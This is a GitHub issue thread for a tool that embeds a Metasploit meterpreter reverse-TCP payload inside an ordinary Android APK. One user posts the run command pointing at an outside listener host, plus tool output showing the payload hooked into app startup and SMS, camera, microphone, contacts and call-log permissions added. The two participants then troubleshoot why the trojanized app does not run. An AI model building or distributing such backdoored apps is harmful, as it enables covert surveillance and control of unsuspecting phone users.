search

0-ali / metasploit-apk-embed-payload

Embed a Metasploit Payload in an Original .Apk File
116 stars 51 forks source link

Embedded Payload not running #11

Closed homecoder closed 8 years ago

homecoder commented 8 years ago

Hi Team,

I am unsure if I am doing something wrong - I can't seem to get the _embedded APK

Environment: Fully updated Kali 2 (Rolling) Command: ./run original.apk.file.apk -p android/meterpreter/reverse_tcp LHOST=my.domain.com Notes: Creating a direct APK (msfvenom) using the same options worked exactly as expected.

Output from command:

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
[3] Decomposing original APK
[4] Decomposing payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading StartupActivity.smali and injecting payload
[+] Adding android.permission.ACCESS_WIFI_STATE
[+] Adding android.permission.CHANGE_WIFI_STATE
[+] Adding android.permission.ACCESS_NETWORK_STATE
[+] Adding android.permission.ACCESS_COURSE_LOCATION
[+] Adding android.permission.ACCESS_FINE_LOCATION
[+] Adding android.permission.SEND_SMS
[+] Adding android.permission.RECEIVE_SMS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CALL_PHONE
[+] Adding android.permission.READ_CONTACTS
[+] Adding android.permission.WRITE_CONTACTS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CAMERA
[+] Adding android.permission.READ_SMS
[+] Adding android.permission.RECEIVE_BOOT_COMPLETED
[+] Adding android.permission.SET_WALLPAPER
[+] Adding android.permission.READ_CALL_LOG
[+] Adding android.permission.WRITE_CALL_LOG
[8] Rebuilding original.apk.file.apk with metasploit payload
W: warning: string 'chapter_no' has no default translation.
W: warning: string 'directory_error' has no default translation.
W: warning: string 'new_label_prompt' has no default translation.
W: warning: string 'prefs_split_screen_linked' has no default translation.
W: warning: string 'prefs_split_screen_not_linked' has no default translation.
W: warning: string 'prefs_split_screen_single' has no default translation.
W: warning: string 'prefs_split_screen_summary' has no default translation.
W: warning: string 'prefs_split_screen_title' has no default translation.
W: warning: string 'sdcard_error' has no default translation.
W: warning: string 'send_sms' has no default translation.
[9] Signing net_embedded.apk
[+]  has been embedded,original.apk.file.apk_embedded.apk

Is it possible that the warnings listed above could be preventing the the embedded metasploit APK from running? I didn't think much of it as it was a warning vs error.

0-ali commented 8 years ago

Hi @homecoder ,you'll find it in working dir of script.

homecoder commented 8 years ago

@xc0d3rz ,

NOT RUNNING and NOT FOUND are two different issues - for clarification, this I found the _embbeded APK, however when running on the target android device the malicious payload is not running.

The Android device is my testing device, and is vulnerable to the exploit as mentioned earlier as running the payload directly from msfvenom works fine.

The issue is: I can run the script, I found the file with the embedded payload, but it does not work on the target device.